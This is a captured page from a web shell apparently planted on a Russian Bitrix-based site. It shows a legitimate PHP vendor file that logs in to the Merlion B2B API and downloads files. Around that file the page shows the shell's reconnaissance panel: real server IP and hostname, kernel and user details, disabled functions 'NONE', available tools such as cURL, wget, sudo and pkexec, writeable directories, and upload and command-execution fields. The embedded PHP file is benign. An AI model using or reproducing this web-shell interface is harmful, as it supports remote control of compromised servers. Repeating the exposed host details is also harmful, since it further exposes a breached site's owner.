403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/esol.importxml/lib/vendors/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/esol.importxml/lib/vendors/b2b.merlion.com.php
<?php
namespace IX;

class B2bmerlioncom {
	public static function GetAuthParams()
	{
		return array(
			'clientNo',
			'clientLogin',
			'password'
		);
	}
	
	public static function GetDownloadFile($arParams, $maxTime=10)
	{
		if(!function_exists('json_encode')) return false;
		$postParams = json_encode($arParams['VARS']);
		$arHeaders = array(
			'User-Agent' => \Bitrix\EsolImportxml\Utils::GetUserAgent(),
			'content-type' => 'application/json',
			'authorization' => 'Bearer initial'
		);
		$ob = new \Bitrix\Main\Web\HttpClient(array('disableSslVerification'=>false));
		foreach($arHeaders as $k=>$v) $ob->setHeader($k, $v);

		$res = $ob->post('https://b2b.merlion.com/api/login', $postParams);
		$arCookies = $ob->getCookies()->toArray();
		$arRes = json_decode($res, true);
		$arHeaders['authorization'] = 'Bearer '.$arRes['csrf_token'];

		$ob = new \Bitrix\Main\Web\HttpClient(array('disableSslVerification'=>false));
		foreach($arHeaders as $k=>$v) $ob->setHeader($k, $v);
		$ob->setCookies($arCookies);
		$fContent = $ob->get($arParams['FILELINK']);
		$hcd = $ob->getHeaders()->get('content-disposition');
		$fn = '';
		if($hcd && stripos($hcd, 'filename=')!==false)
		{
			$hcdParts = preg_grep('/filename=/i', array_map('trim', explode(';', $hcd)));
			if(count($hcdParts) > 0)
			{
				$hcdParts = explode('=', current($hcdParts));
				$fn = end(explode('/', trim(end($hcdParts), '"\' ')));
			}
		}
		if(strlen($fn) > 0)
		{
			$tmpPath = \CFile::GetTempName('', $fn);
			$dir = \Bitrix\Main\IO\Path::getDirectory($tmpPath);
			\Bitrix\Main\IO\Directory::createDirectory($dir);
			file_put_contents($tmpPath, $fContent);
			return \CFile::MakeFileArray($tmpPath);
		}
		
		return false;
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit